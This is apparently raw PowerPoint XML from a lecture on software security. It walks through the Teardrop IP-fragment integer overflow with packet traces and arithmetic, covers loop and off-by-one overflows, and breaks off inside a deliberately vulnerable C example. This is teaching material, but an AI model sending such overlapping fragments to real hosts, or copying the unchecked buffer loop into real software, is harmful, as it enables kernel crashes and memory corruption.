            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset = offset;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end = end;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = end - offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If the fragment is smaller than the size of the overlap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>will be bigger than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>will be negative!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174665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0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02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02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02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029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02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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>222.222.222.222 &gt; 128.111.48.50: (frag 242:40@0+)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>222.222.222.222 &gt; 128.111.48.50: (frag 242:8@24)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset = 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end = 24 + 28 - 20 = 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end = 40 &gt; offset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlap = 40 - 24 = 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset = offset + overlap = 40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = end - offset = 32 - 40 = -8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>will be interpreted as an unsigned value (65528)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Too many bytes will be copied and the kernel will crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114167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2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2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2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23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23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233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233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233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233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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer of different sizes/types should be assigned with great attention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows can make a large signed integer become a large negative value or a large unsigned integer become a small positive value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use assertions and similar checks to avoid overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4320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7970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop overflows happen when the attacker can control the loop iterations and checks are missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A special case: off-by-one loop overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attacks are similar to array overflows, with the difference that only one element above the array capacity is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to modify the least significant byte of pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Frame Pointer Overwrite” by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>klog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 9(55), 1999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48962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79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79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079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079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079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018" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1085850"/>
            <a:ext cx="7848600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Off-by-one Overflow: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110020" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
